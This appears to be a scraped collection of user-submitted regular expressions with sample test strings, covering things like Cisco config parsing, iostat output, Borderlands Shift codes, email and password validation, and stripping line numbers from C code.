<p><img class="alignnone wp-image-36109 size-full" src="https://onhax.net/wp-content/uploads/2014/10/WjhzQlNRaDJrYUUx_o_using-freedom-for-unlimited-in-app-purchases-android-.jpg" alt="WjhzQlNRaDJrYUUx_o_using-freedom-for-unlimited-in-app-purchases-android-" width="480" height="360"/></p> <img class="alignnone size-full wp-image-126019" src="https://i0.wp.com/onhax.net/wp-content/uploads/2016/03/sd.png?resize=300%2C300" alt="" data-recalc-dims="1"/> <img class="alignnone size-full wp-image-126019" src="https://onhax.net/wp-content/uploads/2016/03/sd.png?resize=300%2C300" alt="" data-recalc-dims="1"/>
change img src
2016-07-05T09:03:16.000Z
(\(.*\))
1066/1066: The Battle for Middle Earth (21.05.2015 сериал полностью )
Remove inside ()
2016-09-15T14:59:50.000Z
Regex (to be) used to identify ID of the <script> tag that loaded Leaflet (or Mapbox).
(?:leaflet|mapbox)[\w\-\._]*(?:-script)?
id="leaflet" id="mapbox" id="leaflet-script" id="mapbox-script" id="leaflet-0.7.2-script" id="webmap-leaflet-0.7.2"
Leaflet tag ID matcher
2014-05-22T16:25:51.000Z
Given a time code caption file (not standards compliant) use this script to match all lines following a time code line You can use this regex in Notepad++ to generate a new file that only contains the matches in the form of ^(?!\d:\d{2}+).+
^(?!\d:\d{2}+).+
0:01 Helô a chroeso. Alexander Roberts ydw i a dw i yw 0:04 Rheolwr y Tîm Data Ymchwil. Fi sy'n cyd-ddatblygu polisi’r Brifysgol mewn 0:08 perthynas ag ymchwil sy'n sensitif o ran diogelwch a data ymchwil mewn 0:11 cydweithiad ag Anjana Chaudhuri, y Rheolwr 0:14 Uniondeb Ymchwil a chydweithwyr eraill ar draws y 0:16 Brifysgol. 0:18 Bydd y fideo byr hwn yn esbonio'r broses ar gyfer cofrestru 0:21 ymchwil sy'n Sensitif o ran Diogelwch neu SSR, ym Mhrifysgol Abertawe 0:24 a’i pherthynas â pholisi’r Brifysgol ar ymchwil sy'n sensitif o ran 0:27 diogelwch. 0:31 Mae'r broses cofrestru SSR yn cynnwys nifer o randdeiliaid 0:34 ar draws y Brifysgol ac mae wedi'i datblygu i sicrhau nad yw 0:37 ymchwil sy'n sensitif o ran ymchwil, boed a ariennir yn fewnol neu drwy 0:40 grantiau allanol neu bartneriaethau, yn cael ei chynnal heb 0:43 oruchwyliaeth ddigonol a chynnal asesiad risg cyn iddi 0:46 ddechrau. Mae tryloywder a natur agored yn hanfodol i 0:50 lwyddiant ymchwil ac arloesi oherwydd heb hyn, nid oed modd 0:52 cyflawni manteision gweithgareddau o'r fath yn llawn. Fodd bynnag, dylai'r 0:55 gofyniad hwn fod yn gytbwys â'r angen i 0:58 ddiogelu gwybodaeth wrth rannu dealltwriaeth. 1:01 Mae'n ofyniad i Ymchwil ac Arloesi'r DU (UKRI) bod gan 1:04 sefydliadau system rheoli gwybodaeth gadarn ar waith 1:07 sy'n sicrhau y caiff mynediad at ddata a gwybodaeth sensitif 1:11 ei reoli'n briodol. Mae'r broses cofrestru SSR 1:14 yn garreg sylfaen ar gyfer ein 1:17 system Rheoli Diogelwch Gwybodaeth sefydliadol. 1:21 Felly beth sy'n gwneud ymchwil sy'n sensitif o ran diogelwch yn wahanol i 1:24 fathau eraill o ymchwil? 1:26 Fel pob math o ymchwil, mae ymchwil sy'n sensitif o ran diogelwch 1:29 yn dechrau gyda syniad sy'n cael ei ffurfioli fel gweithgaredd 1:32 ymchwil. Yn y rhan fwyaf o achosion, bydd allbwn terfynol diffiniedig, 1:35 megis papur neu adroddiad academaidd, neu efallai bydd math newydd o 1:38 ddeunydd neu gynnyrch yn cael ei ddatblygu, neu bydd canlyniadau un 1:41 prosiect yn troi'n rhan o brosiect arall sy’n fwy. 1:45 Yn aml, bydd ymchwil sy'n sensitif o ran diogelwch yn cael ei hariannu gan asiantaethau amddiffyn neu 1:48 gyfiawnder troseddol, sy'n gallu bod yn arwydd dda bod 1:51 ymchwil sy'n sensitif o ran diogelwch wrth wraidd prosiectau o'r fath. 1:54 Ond nid yw hyn bob amser yn wir, yn enwedig pan fydd yr ymchwil yn cael ei 1:57 hariannu'n fewnol neu'n fentrus ar ran 2:00 unigolyn. 2:02 Y gwahaniaeth rhwng SSR a mathau eraill o ymchwil yw'r 2:05 risgiau posib sy'n gysylltiedig â'r gweithgareddau a'r 2:08 allbynnau terfynol sy'n ganlyniad gweithgareddau prosiectau o'r fath. 2:11 Un o'r risgiau hyn yw mabwysiadu canfyddiadau 2:14 ymchwil gan wledydd neu gyfundrefnau gelyniaethus at ddibenion ymosodol. Gall risgiau eraill 2:17 fod yn berthnasol i ddiogelu staff prosiect 2:19 a chanlyniadau negyddol posib a allai 2:22 fod yn ganlyniad i gysylltiad â deunydd neu grwpiau eithafol neu radicalaidd, 2:25 neu ymchwil i feysydd a allai ddenu sylw sylweddol gan y cyhoedd, 2:28 megis hawliau anifeiliaid neu ddiogelwch ynni. 2:32 Mae SSR hefyd yn her sylweddol i sefydliadau wrth 2:35 storio data ac allbynnau eraill yn ddiogel yn ystod 2:38 cylch oes prosiect. Gall methu â gwneud hyn ei gwneud hi'n bosib i 2:42 ddeunyddiau sensitif, gan gynnwys data, gael eu dwyn a'i gwneud hi'n bosib i bartïon gelyniaethus 2:45 fonitro gweithgareddau prosiectau a staff. 2:52 Cyn i mi gyflwyno'r broses cofrestru SSR, byddaf yn 2:54 dechrau gan ofyn i unrhyw un sy'n gwylio'r fideo hwn gymryd eiliad i 2:57 ystyried a oes unrhyw ymchwil rydych chi'n bwriadu ei chynnal neu 3:00 eisoes wedi dechrau arni y gellir ei chategoreiddio fel ymchwil sy'n sensitif o ran 3:03 diogelwch yn unol ag Atodiad Un ein Polisi ar 3:06 Ymchwil sy'n Sensitif o ran Diogelwch. Os ydych chi'n ansicr, darllenwch y 3:09 rhestr wirio fer i benderfynu a ddylech chi fod yn dilyn y 3:12 broses cofrestru SSR ac mae'r holl ddolenni mae eu hangen 3:14 yn nisgrifiad y fideo. Mae'n 3:17 bwysig iawn nad ydych chi'n dechrau ar unrhyw ymchwil sydd wedi’i chategoreiddio fel SSR 3:20 nac yn rhoi manylion ymchwil o'i bath i unrhyw systemau 3:22 yn y Brifysgol, 3:23 cyn cwblhau'r broses gofrestru'n gyntaf. Gallai methu cwblhau'r 3:26 broses yn gywir eich rhoi chi, eich cydweithwyr, eich 3:29 myfyrwyr a’r Brifysgol mewn perygl o niwed neu achosi bygythiad i 3:32 ddiogelwch cenedlaethol. 3:34 Mae 5 prif gam i'r broses gofrestru a gynlluniwyd i 3:38 gael eu cwblhau cyn cynnal ymchwil sy'n sensitif o ran diogelwch 3:41 ac un cam terfynol sy'n gysylltiedig â dod ag SSR i ben, a elwir weithiau yn 3:44 gau prosiect, pan allai fod angen cadw neu ddinistrio 3:48 deunyddiau SSR yn unol â pholisïau'r Brifysgol 3:51 a deddfwriaeth. 3:52 Cam un o'r broses hon yw cwblhau'r rhestr wirio SSR. 3:55 Mae'r rhestr wirio hon yn Atodiad 2 y Polisi 3:58 SSR ac mae dolen i'r polisi yn nisgrifiad 4:01 y fideo hwn. Gan ddefnyddio'r rhestr wirio, gellir cwblhau asesiad 4:03 cychwynnol yr ymchwil arfaethedig gan unrhyw un 4:05 sy'n gysylltiedig â'r ymchwil, ond mae'n debygol mai 4:08 ymchwilydd unigol, pennaeth adran, 4:10 Swyddog Moeseg Ymchwil y Gyfadran, neu aelod o dîm 4:13 Hyb Ymchwil y Gyfadran fydd yn ei gynnal. Mae tic mewn unrhyw un o'r blychau ar y rhestr 4:16 wirio hon yn golygu bod y gwaith yn cael ei ystyried i fod yn 4:18 sensitif o ran diogelwch a dylid cwblhau'r holl gamau dilynol 4:21 cyn cynnal unrhyw waith pellach ar y prosiect. 4:26 Os yw'r rhestr wirio wedi'i chwblhau ac nid yw'r ymchwil 4:28 yn cyd-fynd â'r disgrifiadau o SSR, nid oes angen cymryd camau 4:31 pellach a gellir gorffen y broses cofrestru SSR 4:34 a gall gweithgareddau arferol ailddechrau mewn perthynas â'r 4:37 ymchwil arfaethedig. Fodd bynnag, os yw ymchwil wedi'i chategoreiddio fel bod yn 4:40 sensitif o ran diogelwch, mae Cam 2 yn cynnwys cwblhau'r ffurflen 4:43 cofrestru SSR a'r asesiad risg SSR. Mae'r ddwy 4:46 ddogfen ar gael yn Atodiad 3 ac adran pedwar y 4:48 polisi SSR. Eto, dyma eich atgoffa y dylid cwblhau'r holl gamau canlynol 4:51 cyn cynnal unrhyw waith pellach ar y prosiect. 4:56 Mae cam tri o'r broses gofrestru yn cynnwys cyflwyno'r 4:59 cofrestriad SSR a dogfennau asesu risg wedi’u cwblhau i'r 5:02 Swyddfa Uniondeb Ymchwil. Mewn rhai achosion prin, efallai y bydd yr wybodaeth hon 5:05 sydd wedi'i chynnwys yn y dogfennau eu hunain 5:08 yn cael ei hystyried i fod yn sensitif o ran diogelwch, ac o bosib yn cynnwys cyfeiriadau at 5:11 sylweddau a reolir neu grwpiau terfysgol, eiddo 5:14 deallusol, neu wybodaeth weithredol ynghylch galluoedd 5:17 diogelwch y Brifysgol. Mewn achosion o'r fath, dylid e-bostio'r 5:19 ffurflen gofrestru wedi'i chwblhau ar gyfer yr asesiad i'r Dirprwy 5:22 Is-ganghellor ar gyfer Arloesedd Ymchwil, a fydd yn penderfynu 5:25 ar y cam nesaf i'w gymryd i gynnal diogelwch a 5:27 galluogi cofrestriad yr ymchwilydd arfaethedig gan y 5:31 Swyddfa Uniondeb Ymchwil. Os oes pryderon am natur 5:34 yr wybodaeth a nodwyd yn y 5:36 dogfennau Cofrestru ac Asesu Risg, gellid eu e-bostio'n 5:39 uniongyrchol i'r Swyddfa Uniondeb Ymchwil yn 5:42 researchintegrity@abertawe.ac.uk. 5:45 Pan fydd y Swyddfa Uniondeb Ymchwil yn cael y 5:48 ffurflen gofrestru a'r asesiad risg wedi’u cwblhau, cynhelir adolygiad arbenigol o'r 5:50 ymchwil arfaethedig gan aelodau o dimau Moeseg Ymchwil, 5:53 Data Ymchwil, Seibrddiogelwch, Diogelu a 5:56 Diogelwch y Brifysgol. Bydd yr adolygiad hwn yn cynnwys a oes 5:59 gofyniad i'r ymchwil arfaethedig ddefnyddio 6:02 adnoddau storio a chyfrifiadura diogel y Brifysgol sydd ar gael 6:05 at y diben hwn drwy’r Amgylchedd Ymchwil Dibynadwy 6:08 neu gymryd camau lliniaru eraill. Yn seiliedig ar y canfyddiad o risg 6:11 a'r bygythiadau sy'n amlwg yn y ffurflenni cofrestru ac 6:14 asesu risg, gallai barn yr arbenigwr 6:15 argymell cadarnhad pellach bod y Brifysgol yn 6:19 derbyn darpariaeth ar gyfer y risgiau cysylltiedig cyn cytuno y gall 6:23 yr ymchwil symud yn ei blaen. Os nad oes angen cadarnhad pellach, 6:26 mae'r broses yn symud i Gam 5. 6:30 Cam 5 yw cwblhau'r broses gofrestru SSR gan y 6:33 Swyddfa Uniondeb Ymchwil a nodi manylion y 6:37 gweithgaredd yn y Gofrestr o Ymchwil sy'n Sensitif o ran Diogelwch. 6:40 Pan fydd hyn wedi'i gwblhau, anfonir e-bost cadarnhau at y 6:43 Prif-ymchwilydd gan ei hysbysu y gall yr ymchwil 6:46 ddechrau 6:48 ar ben arall cylch bywyd y prosiect. Mae angen i unrhyw un sy'n gwneud ymchwil SSR 6:52 sicrhau y bydd unrhyw ddeunyddiau, gan gynnwys data, 6:55 sy'n cael eu creu yn ystod y prosiect, yn cael eu cadw, eu storio neu eu 6:58 dinistrio'n ffurfiol yn unol â gweithdrefnau a pholisïau'r Brifysgol a 7:02 deddfwriaeth berthnasol. Mae cyngor llawn am storio data, 7:05 gan gynnwys prosiectau a data gweinyddol, ar gael 7:08 drwy gysylltu â'r tîm Rheoli Data Ymchwil yn 7:11 research.data@abertawe.ac.uk. 7:14 Dyna'r diwedd ar y cyflwyniad i'r broses cofrestru SSR 7:16 a hoffwn ddiolch i chi am eich amser. 7:19 Os ydych chi'n meddwl eich bod chi'n gwneud ymchwil sy'n sensitif o ran diogelwch, 7:22 sicrhewch eich bod chi'n gyfarwydd â pholisi’r Brifysgol ar ymchwil sy'n sensitif o ran 7:25 diogelwch a'r atodiadau amrywiol. Os oes gennych chi gwestiynau pellach, 7:28 cysylltwch â'r Swyddfa Uniondeb Ymchwil 7:31 neu'r tîm Rheoli Data Ymchwil.
Find all text lines after simple time code
2023-11-23T14:50:24.000Z
interface\s([\S]+?)\.(\d+)\s+(description\s(?:[^a-zA-Z0-9]?([\S]+)[^a-zA-Z0-9]?))*(?:encapsulation\sdot1q\s(\d+)\s*)*(?:second-dot1q\s(\S+)\s+)*(?:rewrite\singress\stag\s(.+?)\s{2,})*(?:service-policy\sinput\s([\S]+)\s+)*(?:service-policy\soutput\s([\S]+))*.+?(?:\s*!|\s+service\sinstance)
interface Loopback9 description RIFERIMENTO LDP/EoMPLS ip address 172.16.116.23 255.255.255.255! interface Port-channel2 description KdC-TEST_ESPOSITO/CANDIDO_3263 mtu 9206 no ip address logging event link-status load-interval 30 shutdown service instance 301 ethernet description LINK-to-OLO encapsulation dot1q 269 second-dot1q 301 rewrite ingress tag pop 1 symmetric group 12333 service-policy input BTS_P01_B-96k_B3-0_B5-0_B6-0_IN service-policy output BTS_P01_B-96k_B3-0_B5-0_B6-0_OUT xconnect 172.16.116.249 570435069 encapsulation mpls mtu 9206 service instance 301 ethernet description LINK-to-OLO encapsulation dot1q 269 second-dot1q 301 rewrite ingress tag pop 1 symmetric group 12333 service-policy input BTS_P01_B-96k_B3-0_B5-0_B6-0_IN service-policy output BTS_P01_B-96k_B3-0_B5-0_B6-0_OUT xconnect 172.16.116.249 570435069 encapsulation mpls mtu 9206 ! service instance 4001 ethernet description SI_VLAN-PING encapsulation dot1q 4001 rewrite ingress tag pop 1 symmetric service-policy input PING_LIMIT bridge-domain 4001 !! interface Port-channel2.302 description "vlan_pseudo_lato_olo" encapsulation dot1q 1327 second-dot1q 1001 rewrite ingress tag pop 1 symmetric service-policy input GBE_remark_in service-policy output GBE_remark_out ! interface Port-channel2.302 description test_subif!
VLAN_SUBINTERFACE
2017-06-22T16:09:05.000Z
Search facets are patterned like TAXONOMY:60047, GO:GO:34566, disease:"Alzheimer's Disease", modellingapproach:"Petri-net", so on. A query string is often made up search keywords and these facets. To extract precise search keywords, we get rid of those facets and the rest of the query string is search keywords.
((AND|OR|NOT)( ))?([a-z_A-Z0-9]*):("\w+.*"|\w+(:?\w+))
homo sapiens AND curationstatus:"Manually curated" AND modellingapproach:"Ordinary differential equation model" test AND UNIPROT:23456 AND metabolism AND heart AND TAXONOMY:40674 AND curation:"Non curated" AND GO:GO:34212 AND publication:23444 AND modellingapproach:"logical model" AND cancer modelformat:"SBML" AND modelformat:"SBML" AND modellingapproach:"Ordinary differential equation model" AND TAXONOMY:9606 *:* AND modelformat:"SBML" AND modellingapproach:"Ordinary differential equation model" AND TAXONOMY:9606 AND TAXONOMY:10090 *:* AND disease:"Lung Adenocarcinoma" AND cancer AND tumor
Find and remove search facets so as to extract precise search keywords
2019-04-28T19:53:21.000Z
([a-z ]*([A-Z])[a-z ]*)
$txt['addThe_fer_Te'] = 'Adds a Notification System to The rEst'; $txt['cs_add'] = 'Add'; $txt['add_stuff'] = 'Add stuff'; $txt['take_out'] = 'The Trash';
All capital letters of SMF lang files
2019-04-27T12:50:50.000Z
^(?P<io_device_name>[a-z|0-9]+)+\s+(?P<io_read_req_per_sec>\d+\.\d+)+\s+(?P<io_write_req_per_sec>\d+\.\d+)+\s+(?P<io_read_kb_per_sec>\d+\.\d+)+\s+(?P<io_write_kb_per_sec>\d+\.\d+)+\s+(?P<io_req_avg_wait_millisec>\d+\.\d+)+\s+(?P<io_req_avg_service_millisec>\d+\.\d+)+\s+(?P<io_bandwidth_utilization_percent>\d+\.\d+)
Device rReq_PS wReq_PS rKB_PS wKB_PS avgWaitMillis avgSvcMillis bandwUtilPct loop0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop4 0.00 0.00 0.00 0.00 0.00 0.00 0.00 nvme0n1 0.00 15.00 0.00 60.00 0.80 0.53 0.80 Device rReq_PS wReq_PS rKB_PS wKB_PS avgWaitMillis avgSvcMillis bandwUtilPct loop0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop4 0.00 0.00 0.00 0.00 0.00 0.00 0.00 nvme0n1 10.00 15.00 445.00 60.00 41.80 15.53 100.80
iostat
2019-09-10T22:28:49.000Z
Matches PC Shift Codes for borderlands 2 & Pre Sequel Capturing group 1 for complete code only
PC\D*((([\dA-Z]{5})-){4}\g<3>)
PC: WW533-S5T3B-53JJB-JTBT3-WZRBH PS3: WW533-S5T3C-39JKB-STCT3-WZRRS XBOX: WW533-S5T6F-65RJF-KXBT3-WZRW9 PC: CCCBB-X5JTB-5BB33-TJ3BJ-SK3KR PS3: CCCBB-X5JTC-3HB53-ZJ5BJ-SK3ST XBOX: CCCBB-X5JXF-6CF36-WR3BJ-SK3XW PC: 5CKBB-K53BJ-CJTTT-JTJ3B-BHCSJ PS3: 5CKBB-K53BK-BSTWT-STK3B-BHCTZ XBOX: 5CKBB-K53FR-FKXTX-KXJ3B-BHCFW PC: 5WWBJ-TWBJJ-KT3JB-TJBBB-CJ5KJ PS3: 5WWBJ-TWBJK-JZ3KB-ZJCBB-CJ555 XBOX: 5WWBJ-TWBRR-RW6JF-WRBBB-CJ5T9 BL: TPS 1 GK: PS3: WCWBT-S3TTK-BSJK3-HT5TB-TWR9W WinPC/Mac/Linux: WCWBT-S3TTJ-CJJJ3-BT3TB-TWRWZ X360: WCWBT-S3TXR-FKRJ6-CX3TB-TWR3R BL: TPS 1 GK: PS3: C5KTB-RTJ35-B93WT-HBKBB-WZWBX WinPC/Mac/Linux: C5KTB-RTJ33-C33TT-BBJBB-WZWJX X360: C5KTB-RTJ66-F56TX-CFJBB-WZWX5 BL: TPS 1 GK: PS3: C5CJB-WTT3W-TSJCT-ST5JJ-CKJKX WinPC/Mac/Linux: C5CJB-WTT3T-WJJBT-JT3JJ-CKJZ3 X360: C5CJB-WTT6X-XKRBX-KX3JJ-CKJZX Nov 13 The Pre-Sequel: PS3: C5CTT-3JJJK-B9JWJ-S35BJ-SZ99H WinPC/Mac/Linux: C5CTT-3JJJJ-C3JTJ-J33BJ-SZ9SK X360: C5CTT-3JJRR-F5RTR-K63BJ-SZ9KW BL:TPS GK: PS3: WW533-S5T3C-39JKB-STCT3-WZRRS WinPC/Mac/Linux: WW533-S5T3B-53JJB-JTBT3-WZRBH X360: WW533-S5T6F-65RJF-KXBT3-WZRW9
Borderlands PC Shift Codes
2014-11-28T10:24:30.000Z
Loadcase -- \d+\s+(.+)\s{6}
Loadcase -- 1 Dead + Roof Live Dur Factors: 1.15 1.15 Domain Type ------------Name------------ Dir plf-beg plf-end -x-beg-- -x-end-- -y-beg-- -y-end-- Top Dead TCDL Vert 14.00 14.00 -2-00-00 11-00-00 Top Dead TCDL Vert 14.00 14.00 11-00-00 24-00-00 Bottom Dead BCDL Vert 20.00 20.00 0 22-00-00 Attic_BC Dead RoomDL_BC Vert 20.00 20.00 3-06-08 18-02-12 Attic_TC Dead RoomDL_TC Vert 10.00 10.00 3-09-04 18-02-12 Top RoofLive TCLL Vert 60.00 60.00 -2-00-00 11-00-00 Top RoofLive TCLL Vert 60.00 60.00 11-00-00 24-00-00 Domain Type ------------Name------------ Dir Lbs -x-loc-- -y-loc-- EQ plf EQ width Bottom Dead SidewallDL Vert 49 3-05-03 07-05 24.5 24.0 Bottom Dead SidewallDL Vert 49 18-04-01 07-03 24.5 24.0
catch Loadcase Name
2015-08-20T09:15:36.000Z
\d{2}:\d{2}:\d{2} \d*
Stackexchange: Create date variable from time
2015-01-27T14:39:53.000Z
\"ou\"\:\"(https?:\/\/.*\.(?:png|jpg|jpeg|gif))
{"cb":21,"cl":3,"cr":3,"ct":21,"id":"dW5GZvKh_3M_2M:","isu":"www8.hp.com","itg":false,"ity":"png","oh":356,"ou":"http://product-images.www8-hp.com/digmedialib/prodimg/lowres/c03235671.png","ow":474} {"cb":21,"ct":21,"id":"9br0fx79WphEoM:","isu":"centrecom.com.au","itg":false,"ity":"jpeg","oh":400,"ou":"https://centrecomstatic.s3.amazonaws.com/images/upload/0015329_0.jpeg","ow":400} {"cb":21,"cl":3,"cr":3,"ct":21,"id":"JhRyJSH9KgtexM:","isu":"www8.hp.com","itg":false,"ity":"png","oh":356,"ou":"http://product-images.www8-hp.com/digmedialib/prodimg/lowres/c03235691.png","ow":474} {"cb":21,"cl":3,"cr":3,"ct":21,"id":"r0jI0V0ECpUxCM:","isu":"www8.hp.com","itg":false,"ity":"png","oh":356,"ou":"http://product-images.www8-hp.com/digmedialib/prodimg/lowres/c03235770.png","ow":474} {"ct":3,"id":"ySkYQ0zkDOWQaM:","isu":"amazon.com","itg":false,"ity":"jpg","oh":524,"ou":"https://images-na.ssl-images-amazon.com/images/I/715CMBwfmtL._SL1500_.jpg","ow":1500} {"cl":3,"cr":3,"id":"4XMWsfu3vQSwcM:","isu":"geb.ebay.in","itg":false,"ity":"jpg","oh":354,"ou":"http://i.ebayimg.com/00/s/NjQxWDkwNQ\u003d\u003d/z/vD0AAOSwyQtVm-3Z/$_12.JPG?set_id\u003d880000500F","ow":500} {"cb":3,"cl":3,"ct":3,"id":"nl8KfxeJ1X1X1M:","isu":"argep.hu","itg":false,"ity":"jpg","oh":239,"ou":"http://www.usanotebook.hu/termekek/HP-Compaq-NB-USB-3.0-port-replikator-3005pr-32216A.jpg","ow":550}
extract images from google image results
2016-09-02T16:39:41.000Z
^(?P<io_device_name>[a-z|0-9]+)+\s+(?P<io_read_req_per_sec>\d+\.\d+)+\s+(?P<io_write_req_per_sec>\d+\.\d+)+\s+(?P<io_read_kb_per_sec>\d+\.\d+)+\s+(?P<io_write_kb_per_sec>\d+\.\d+)+\s+(?P<io_req_avg_wait_millisec>\d+\.\d+)
Device rReq_PS wReq_PS rKB_PS wKB_PS avgWaitMillis avgSvcMillis bandwUtilPct loop0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop4 0.00 0.00 0.00 0.00 0.00 0.00 0.00 nvme0n1 0.00 15.00 0.00 60.00 0.80 0.53 0.80 Device rReq_PS wReq_PS rKB_PS wKB_PS avgWaitMillis avgSvcMillis bandwUtilPct loop0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 loop4 0.00 0.00 0.00 0.00 0.00 0.00 0.00 nvme0n1 10.00 15.00 445.00 60.00 41.80 15.53 100.80
iostat
2019-09-07T20:30:16.000Z
grep Acc #, GUID, Sender/Receiver names
(?<DeviceId>\w*)\s+,\s+(?<Description>[\w\'\-]*[\,\s]?[\w\s]+)\s+,\s+(?<Model>[\w\s\-()]*)\s+,\s+(?<Protocol>[A-Z]+)\s+,\s+(?<DevicePool>[\w\-]*)
name (constant) descripton (constant) name (constant) name (constant) name =============== ========== ================ ========== ================================= ========== ==== ========== ======= CSFCOGRADY , O'Grady, Conor CSF , Cisco Unified Client Services Framework , SIP , DP-GBLON-AL-DESKTOP CSFJIWU , Wu, Jiayi CSF , Cisco Unified Client Services Framework , SIP , DP-GBLON-FH-DESKTOP SEPB8621F6D62BB , Auto 2032 , Cisco 8961 , SIP , Default SEPDC4A3E576074 , Auto 2000 , Cisco IP Communicator , SCCP , Default SEP00FFF74297DE , Auto 2047 , Cisco IP Communicator , SCCP , Default SEP001A2B3C0000 , Sip Test Lines A , Third-party SIP Device (Advanced) , SIP , Default SEP001A2B3C0001 , Sip Test Lines B , Third-party SIP Device (Advanced) , SIP , Default SEP68ECC5620C0E , Auto 2001 , Cisco IP Communicator , SCCP , Default SEP8C1645309770 , Auto 2002 , Cisco IP Communicator , SCCP , Default SEP1C1D862E9E8A , Auto 2022 , Cisco 8961 , SIP , Default SEP8C1645309837 , Auto 2003 , Cisco IP Communicator , SCCP , Default SEP8C164530972E , Auto 2004 , Cisco IP Communicator , SCCP , Default
formatVerificationTransaction_dim
2020-02-12T16:19:12.000Z
Its a regex expression that matches with severals allowed kinds of emails.Enjoy it.
^(?:\")?(?:\w+(?:\.|\_|\<)?)+\w+(?:\")?@(?:\w+\.)+\w{2,}(?:\>)?$
john@something.com john.doe_@yahoo.com "john.doe"@gmail.com John_Doe_<johnDoe@something.net>
Some kinds of emails regex.
2015-11-17T14:50:35.000Z
\d+(.*)
/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ 6 #include <stdio.h> 7 #include <sys/types.h> 8 #include <string.h> 9 #include <errno.h> 10 #include <sys/stat.h> 11 #include <fcntl.h> 12 #include <sys/mman.h> 13 #include <semaphore.h> 14 #include <sys/signal.h> 15 #include <signal.h> 16 #include <dirent.h> 17 #include <sys/stat.h> 18 #include <sys/wait.h> 19 #include <pthread.h> 20 21 #define BUFSIZE 10 22 #define TCOUNT 10 23 #define ITEMS 10000 24 25 26 struct item { 27 int value; // produced value 28 int source; // index of producer 29 }; 30 31 struct buffer { 32 int count; 33 int in; 34 int out; 35 struct item data[BUFSIZE]; 36 pthread_mutex_t mutex; 37 pthread_cond_t xp; // producer will wait for a slot using this 38 pthread_cond_t xc; // consumer fill wait for an item using this 39 }; 40 41 42 struct buffer *buf; // shared bounded buffer 43 44 static void * 45 producer_thread(void *arg) 46 { 47 48 int index; // thread index 49 int i = 0; 50 51 index = (int) arg; 52 53 for (i = 0; i < ITEMS; ++i) { 54 55 // value of i is the item produced 56 57 pthread_mutex_lock(&buf->mutex); 58 while (buf->count == BUFSIZE) 59 pthread_cond_wait(&buf->xp, &buf->mutex); 60 // sleeps in this loop as long as buffer is full 61 7.1. POSIX NAMED SEMAPHORES 117 62 63 // put the item into buffer 64 buf->data[buf->in].value = i; 65 buf->data[buf->in].source = index; 66 buf->in = (buf->in + 1) % BUFSIZE; 67 buf->count++; 68 69 if (buf->count == 1) 70 pthread_cond_signal(&buf->xc); 71 72 pthread_mutex_unlock(&buf->mutex); 73 74 } 75 76 pthread_exit (NULL); 77 } 78 79 80 81 static void * 82 consumer_thread(void *arg) 83 { 84 int n = 0; 85 int x; 86 int s; 87 88 while (1) { 89 pthread_mutex_lock(&buf->mutex); 90 91 while (buf->count == 0) 92 pthread_cond_wait(&buf->xc, &buf->mutex); 93 // sleeps in this loop as long as buffer is empty 94 95 96 97 // retrive an item from buffer 98 x = buf->data[buf->out].value; 99 s = buf->data[buf->out].source; 100 buf->out = (buf->out + 1) % BUFSIZE; 101 buf->count--; 102 103 if (buf->count == (BUFSIZE - 1)) { 104 // wake up all possible workers; 105 // otherwise some workers will always sleep 106 pthread_cond_broadcast (&buf->xp); 107 } 108 109 pthread_mutex_unlock(&buf->mutex); 110 111 n++; 112 113 if (n == (TCOUNT * ITEMS)) 114 break; 115 } 116 117 printf ("retrieved %d items\n", n); 118 CHAPTER 7. SYNCHRONIZATION 118 119 printf ("consumer finished successfully\n"); 120 121 pthread_exit (NULL); 122 } 123 124 125 int 126 main(int argc, char **argv) 127 { 128 129 pthread_t pids[TCOUNT]; // producer tids 130 pthread_t ctid; // consumer tid 131 int i; 132 int ret; 133 134 135 buf = (struct buffer *) malloc(sizeof (struct buffer)); 136 buf->count = 0; 137 buf->in = 0; 138 buf->out = 0; 139 pthread_mutex_init(&buf->mutex, NULL); 140 pthread_cond_init(&buf->xp, NULL); 141 pthread_cond_init(&buf->xc, NULL); 142 143 144 // create producer threads 145 for (i = 0; i < TCOUNT; ++i) { 146 ret = pthread_create(&pids[i], NULL, producer_thread, 147 (void *) i); 148 if (ret < 0) { 149 perror("thread create failed\n"); 150 exit(1); 151 } 152 } 153 154 155 // create consumer thread 156 ret = pthread_create(&ctid, NULL, consumer_thread, (void *) NULL); 157 if (ret < 0) { 158 perror("thread create failed\n"); 159 exit(1); 160 } 161 162 163 // wait for the producer threads to terminate 164 for (i = 0; i < TCOUNT; ++i) 165 pthread_join(pids[i], NULL); 166 167 // wait for the consumer thread to terminate 168 pthread_join(ctid, NULL); 169 170 free(buf); 171 172 pthread_mutex_destroy(&buf->mutex); 173 pthread_cond_destroy(&buf->xp); 7.2. PETERSON’S SOLUTION TO CRITICAL REGION PROBLEM 119 174 pthread_cond_destroy(&buf->xc); 175 176 printf("program ending...bye..\n"); 177 exit (0); 178 }
delete line numbers
2016-03-17T07:32:49.000Z
Must have at leat one number, at leat one capital letter, at least one lower case letter. Also you can have special characters !.@$%&*+=-_? if you want for extra security. This is not manditory. Change (?=.*[a-z\!.@$%&*+=\-\_?]) to (?=.*[\!.@$%&*+=\-\_?]) to make thees special characters manditory. No less than 8 no more thant 20 characters allowed.
(^(?=.*\d)(?=.*[A-Z])(?=.*[a-z])(?=.*[a-z\!.@$%&*+=\-\_?]).{8,20}$)
Password secure but flexable
2015-07-03T01:18:47.000Z
(\s|\))like(\s|\()
